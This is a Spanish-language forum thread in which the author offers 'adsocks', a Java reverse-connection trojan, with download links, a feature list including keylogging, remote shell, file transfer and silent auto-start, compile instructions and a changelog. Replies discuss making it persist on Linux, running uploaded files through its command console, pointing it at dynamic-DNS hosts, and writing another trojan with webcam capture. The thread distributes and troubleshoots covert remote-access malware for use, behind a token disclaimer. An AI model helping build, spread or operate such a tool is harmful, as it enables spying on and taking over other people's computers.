link de descarga:
http://sourceforge.net/projects/adsocks
si encuentran algun bug postearlo.
Es un troyano de conexión inversa, el servidor se conecta al cliente, asi es mas facil que el cliente abra el puerto que tener que abrir el puerto en todos los servers.
- Captura del escritorio
- control del mouse
- subir y bajar archivos
- linea de comandos
- keylogger
- escucha en 3 puertos.
- autogenerador del server
- Algunas caracteristicas adicionales estan disponible en la version privada http://adsocks.sytes.net (http://adsocks.sytes.net)
(http://farm5.static.flickr.com/4104/5202743451_5006933b88_b_d.jpg)
FORMA DE COMPILAR:
esta compuesto de 3 proyectos: lib.class, troyano, adsocks.
compilen el proyecto lib.class despues vayan a la carpeta dist y renombren el lib.class.jar generado por lib.class y lo copian en la carpeta src del proyecto troyano.
Lo mismo para con el proyecto troyano compilan luego se van a la carpeta dist renombran el archivo troyano.jar generado por lib.class y lo copian en la carpeta src del proyecto adsocks.
Y por ultimo compilan el proyecto adsocks y ya tienen el adocks listo para su uso.
update 0.3.0:
-el servidor ya funciona en linux pero no se auto inicia
update 0.4.0:
- se ha agregado nueva opcion keylogger
- ahora se crea 2 sevidores uno sin autuinicio para pruebas.
- opcion update compatible con servidor 0.3.0
update 0.4.1:
- ya se autoinicia en linux
- se puede activar/desactivar el mouse
updade 0.4.2:
- se ha arreglado problemas en la linea de comandos que dejaba sin conexion al servidor.
update 0.5.0:
- se ha corregido un error grave al bajar archivos
- se ha mejorado la interfaz para juntar todas las opciones
- algunas adiciones listas para un futuro no muy lejano
update 0.5.1:
- se ha mejorado la opcion update de un server para que se cierre lo que esta ejecutandose en memoria y se autoejecute la nueva version.
Nota: El autor no se hace responsable por el mal uso que le den a la herramienta.
En subir archivo lo ejecuta?
A que te refieres con auto-arranque?
Saludos
Subirlo y que se ejecute en el equipo.Pero ahora lo testeo y pruebo con command.
edito: le doy a cambiar puerto y sigue todo igual.
MÃηsaηα:
no se ejecuta hay que ejecutarlo con el command.
el archivo subido se copia en c:\windows\temp
Debci:
a que cuando apagas la maquina y la vuelvas a encender se vuelva a ejecutar el servidor.
nota: la opción update no funciona bien me olvide arreglarlo.
AngelCruel, se supone que todo malware deberia tener esa opcion y mas cuando lo que se quiere es tener acceso remoto a un equipo.
Lord R.N.A.:
yo lo veo mas facil ir a la opción de command en el adsocks y poner:
exed c:\windows\temp\nombredelarchivo.exe
ese es el comando para ejecutar un archivo con el directorio completo.
talvez el archivo que sube no es un ejecutable.
no me refiero a eso... me refiero a iniciar con el sistema.
1. El servidor no corre en linux
2. Falta un buen manejo de memoria
3. Errores al iniciar el servidor
4. Falta un buen manejo de excepciones
5. Desordenado
6. Problemas el cambiar puerto
7. Trabaja mas orientado a objetos
luego miro mas a fondo :xD
Lord R.N.A.:
ok
LEYER:
1. si es cierto nesecito que en una linea de bash se agregue el autoarranque en rc.local haber quien postea la solución y tambien en mac.
3. no agregaba en la lista a los servidores cuando se conectaban varios al mismo tiempo ya esta arreglado gracias por la info.
6. lastimosamente hay que reiniciar el programa despues de cambiar el puerto, pero ahora escucha en 3 puertos.
Ya si que me funciona, ya que lo has arreglado, en un momento pensé que era problema mio.MMm.. al final se inicia con windows o no?
MÃηsaηα:
si se inicia con windows lo que falta es que se inicie en linux y mac.
Sistemas Operativos en que opera este RAT?
alexkof158:
en windows funciona al 100 %
en linux el autoarranque no funciona (el servidor funciona al 100 % pero falta probar si se conecta construido desde el adsocks)
y en mac no se como ira jeje
Que programa usais para compilar en java??
en netbeans son 3 proyectos:
lib.class se compila y se copia en troyano quitandole la extension, luego este se compila y se copia en adsocks cambiandole el nombre a lib.class.
Una cuestioncilla. A la hora de crear el servidor y meter nuestra ip, ¿se podría utilizar algún servidor del estilo no-ip y similares?
PD: Gracias por el curro!!
magarcan:
si puedes utilizar.
Cita de: AngelCruel en 25 Octubre 2010, 00:26 AM
magarcan:
si puedes utilizar.
¿Estas seguro que el server resuelve la IP del dominio? :¬¬
el server no, pero las paginas del estilo no-ip hacen eso, tambien esta el dyndns.
Hola, yo también estoy escribiendo un troyano pero no en Java sino en C++ con las librerias Qt4, te queria preguntar si tu troyano tiene soporte para capturar Webcam ya que esto me trae de cabeza para hacerlo multiplataforma. Si es asi ¿Como lo has logrado?.
Yo lo estoy intentando con OpenCV pero tengo problemas al compilarlo de forma estática y no encuentro nadie que sepa una solución.
Por si a alguien le interesa aqui esta el post de mi troyano:
http://foro.elhacker.net/analisis_y_diseno_de_malware/demonio_un_troyano_con_licencia_gpl-t313241.0.html
paju1986:
tenia que usar el jmf pero la verdad que aun no he intentado como quedaria.